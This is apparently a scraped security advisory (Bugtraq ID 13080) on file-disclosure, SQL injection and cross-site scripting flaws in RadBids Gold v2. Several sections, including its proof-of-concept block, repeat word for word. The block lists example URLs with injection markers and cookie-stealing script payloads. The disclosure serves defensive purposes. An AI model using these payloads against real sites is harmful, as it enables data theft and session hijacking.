RadScripts RadBids Gold Multiple Vulnerabilities
BID:13080
Info
RadScripts RadBids Gold Multiple Vulnerabilities
| Bugtraq ID: | 13080 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1073 CVE-2005-1074 CVE-2005-1075 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 09 2005 12:00AM |
| Updated: | Jul 12 2009 12:56PM |
| Credit: | Discovery is credited to dcrab <[email protected]>. |
| Vulnerable: |
RadScripts RadBids Gold v2 |
| Not Vulnerable: | |
Discussion
RadScripts RadBids Gold Multiple Vulnerabilities
RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection.
The following specific vulnerabilities were identified:
A remote attacker can disclose arbitrary files. Information gathered through this issue may allow the attacker to carry out other attacks against an affected computer.
The application is affected by a SQL injection vulnerability. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Multiple cross-site scripting issues have been identified as well. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
RadBids Gold v2 is reported vulnerable to these issues. Other versions may be affected as well.
RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection.
The following specific vulnerabilities were identified:
A remote attacker can disclose arbitrary files. Information gathered through this issue may allow the attacker to carry out other attacks against an affected computer.
The application is affected by a SQL injection vulnerability. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Multiple cross-site scripting issues have been identified as well. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
RadBids Gold v2 is reported vulnerable to these issues. Other versions may be affected as well.
Exploit / POC
RadScripts RadBids Gold Multiple Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/auciton_software/index.php?read=arbitary_file
http://www.example.com/auciton_software/index.php?a=listings&mode='SQL_INJECTION&order=name&cat=
SELECT id, area, radbids_listings.moderated, name, type, featured, hot, urgent, detailview, viewcount, COUNT(radbids_bids.pid) AS bids, AVG(radbids_bids.price) AS
average, MAX(radbids_bids.dateposted) AS lastbid, radbids_listings.dateposted, UNIX_TIMESTAMP(radbids_listings.dateposted) AS pdate,
UNIX_TIMESTAMP(dateexpire)-UNIX_TIMESTAMP(NOW()) AS timeleft, radbids_rate.avgrate, min_bid, bid_inc, buynow, dateawarded, listing_type FROM radbids_listings LEFT JOIN
radbids_bids ON radbids_listings.id=radbids_bids.pid LEFT JOIN radbids_rate ON radbids_listings.id=radbids_rate.pid WHERE GROUP BY id ORDER BY name, dateposted DESC
LIMIT 0,25
http://www.example.com/auciton_software/faq.php?farea=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/auciton_software/index.php?a=listings&mode=1&order=name&cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/auciton_software/index.php?a=listings&mode=1&order='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=
http://www.example.com/auciton_software/index.php?a=myareas&area=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/auciton_software/index.php?read=arbitary_file
http://www.example.com/auciton_software/index.php?a=listings&mode='SQL_INJECTION&order=name&cat=
SELECT id, area, radbids_listings.moderated, name, type, featured, hot, urgent, detailview, viewcount, COUNT(radbids_bids.pid) AS bids, AVG(radbids_bids.price) AS
average, MAX(radbids_bids.dateposted) AS lastbid, radbids_listings.dateposted, UNIX_TIMESTAMP(radbids_listings.dateposted) AS pdate,
UNIX_TIMESTAMP(dateexpire)-UNIX_TIMESTAMP(NOW()) AS timeleft, radbids_rate.avgrate, min_bid, bid_inc, buynow, dateawarded, listing_type FROM radbids_listings LEFT JOIN
radbids_bids ON radbids_listings.id=radbids_bids.pid LEFT JOIN radbids_rate ON radbids_listings.id=radbids_rate.pid WHERE GROUP BY id ORDER BY name, dateposted DESC
LIMIT 0,25
http://www.example.com/auciton_software/faq.php?farea=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/auciton_software/index.php?a=listings&mode=1&order=name&cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/auciton_software/index.php?a=listings&mode=1&order='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=
http://www.example.com/auciton_software/index.php?a=myareas&area=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Solution / Fix
RadScripts RadBids Gold Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
RadScripts RadBids Gold Multiple Vulnerabilities
References:
References: